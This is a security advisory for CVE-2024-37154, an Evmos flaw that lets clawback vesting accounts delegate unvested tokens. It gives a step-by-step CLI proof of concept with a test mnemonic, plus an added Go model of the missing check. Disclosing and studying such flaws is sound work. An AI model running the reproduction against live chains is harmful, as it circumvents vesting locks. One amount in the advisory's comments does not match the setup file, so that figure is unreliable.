CVE-2024-37154

Severity: MEDIUM 5.3 | EPSS 0.26%

Evmos allows unvested token delegations

Published: 6/6/2024 | Modified: 10/15/2024
Also known as: GHSA-7hrh-v6wp-53vw, GO-2024-2904

Description

### Impact

_What kind of vulnerability is it? Who is impacted?_

At the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via `ClawbackVestingAccount`.

### Patches

_Has the problem been patched? What versions should users upgrade to?_

[The PR linked to this advisory](https://github.com/evmos/evmos-ghsa-7hrh-v6wp-53vw/pull/1) includes part of the fix. The remainder is in a [second advisory on the Cosmos SDK fork](https://github.com/evmos/cosmos-sdk/security/advisories/GHSA-wj6f-x5wv-8pqv).

### Workarounds

_Is there a way for users to fix or remediate the vulnerability without upgrading?_

There is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it.

### References

_Are there any links users can visit to find out more?_

See the integration tests for more details on the exploit, or use the following to reproduce it on the CLI:

1. Download `vesting_setup.json` with the following contents:

   ```json
   {
     "start_time": 1679602272,
     "periods": [
       {
         "coins": "100000000000000000000aevmos",
         "length_seconds": 10
       },
       {
         "coins": "100000000000000000000aevmos",
         "length_seconds": 259200000
       }
     ]
   }
   ```

2. Run the following CLI commands to reproduce the issue locally:

   ```shell
   evmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes

   # Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested
   evmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd

   evmosd keys add key1 --recover --home ~/.tmp-evmosd
   # Enter the following mnemonic when prompted:
   # skate tell option purity cattle poverty street act bone govern way various

   evmosd q staking validators --home ~/.tmp-evmosd | grep operator_address

   # Substitute the operator address from the previous query
   # Note that this delegates 70% of the user's available stake
   evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes

   # Re-run the same command
   evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes

   # Note that the total delegations now exceed the user's vested balance
   evmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd
   ```
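As an added illustration of the invariant this advisory says was not enforced (this is not code from Evmos, the Cosmos SDK fork, or the linked PR), the following hypothetical Go model computes the vested amount from the schedule in `vesting_setup.json` above and rejects any delegation that would reach into unvested funds. The type and function names (`VestingAccount`, `VestedAt`, `CheckDelegate`, and so on) are assumptions made for this example; the amounts and timestamps are the advisory's own, and the two 70-token delegations mirror the reproduction steps.

```go
package main

import (
	"errors"
	"fmt"
	"math/big"
)

// Period is one entry of the advisory's "periods" array: Amount (in aevmos)
// vests once LengthSeconds have elapsed after the previous period ended.
type Period struct {
	Amount        *big.Int
	LengthSeconds int64
}

// VestingAccount is a hypothetical, simplified model of a periodic clawback
// vesting account; it is not Evmos's ClawbackVestingAccount.
type VestingAccount struct {
	StartTime int64    // unix seconds, the "start_time" field
	Periods   []Period // the "periods" array
	Delegated *big.Int // amount already delegated out of this account
}

// aevmos parses a decimal amount string such as "100000000000000000000".
func aevmos(s string) *big.Int {
	n, ok := new(big.Int).SetString(s, 10)
	if !ok {
		panic("bad amount: " + s)
	}
	return n
}

// Total is the sum of all vesting periods.
func (a VestingAccount) Total() *big.Int {
	total := new(big.Int)
	for _, p := range a.Periods {
		total.Add(total, p.Amount)
	}
	return total
}

// VestedAt returns the amount vested at unix time now. Periods are cumulative:
// period i vests at StartTime plus the lengths of periods 0..i.
func (a VestingAccount) VestedAt(now int64) *big.Int {
	vested := new(big.Int)
	end := a.StartTime
	for _, p := range a.Periods {
		end += p.LengthSeconds
		if now < end {
			break
		}
		vested.Add(vested, p.Amount)
	}
	return vested
}

// UnvestedAt is the remainder that must not be delegatable yet.
func (a VestingAccount) UnvestedAt(now int64) *big.Int {
	return new(big.Int).Sub(a.Total(), a.VestedAt(now))
}

// ErrExceedsVested is returned when a delegation would use unvested funds.
var ErrExceedsVested = errors.New("delegation exceeds vested, undelegated balance")

// CheckDelegate is the guard the advisory describes as missing: the requested
// amount plus everything already delegated must stay within the vested balance.
func CheckDelegate(a VestingAccount, now int64, amount *big.Int) error {
	free := new(big.Int).Sub(a.VestedAt(now), a.Delegated)
	if amount.Cmp(free) > 0 {
		return fmt.Errorf("%w: requested %s, delegatable %s", ErrExceedsVested, amount, free)
	}
	return nil
}

// Delegate applies CheckDelegate and records the delegation on success.
func (a *VestingAccount) Delegate(now int64, amount *big.Int) error {
	if err := CheckDelegate(*a, now, amount); err != nil {
		return err
	}
	a.Delegated = new(big.Int).Add(a.Delegated, amount)
	return nil
}

// AdvisoryAccount builds the account from the advisory's vesting_setup.json.
func AdvisoryAccount() VestingAccount {
	return VestingAccount{
		StartTime: 1679602272,
		Periods: []Period{
			{Amount: aevmos("100000000000000000000"), LengthSeconds: 10},
			{Amount: aevmos("100000000000000000000"), LengthSeconds: 259200000},
		},
		Delegated: new(big.Int),
	}
}

func main() {
	acct := AdvisoryAccount()
	now := acct.StartTime + 10 // first period has vested, second has not
	seventy := aevmos("70000000000000000000")
	fmt.Println("vested:", acct.VestedAt(now), "unvested:", acct.UnvestedAt(now))
	fmt.Println("first delegation:", acct.Delegate(now, seventy))  // accepted
	fmt.Println("second delegation:", acct.Delegate(now, seventy)) // rejected
}
```

The check is deliberately expressed against the vested balance minus what is already delegated, rather than against the account's spendable balance alone: the reproduction above shows that a second delegation of 70 tokens passes when only the spendable balance is consulted, because the first delegation has already moved 70 vested tokens out of the spendable balance while the 100 unvested tokens still sit in the account.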

Affected packages (31)

CVSS scores

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 3.1 | MEDIUM 5.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N |

References (4)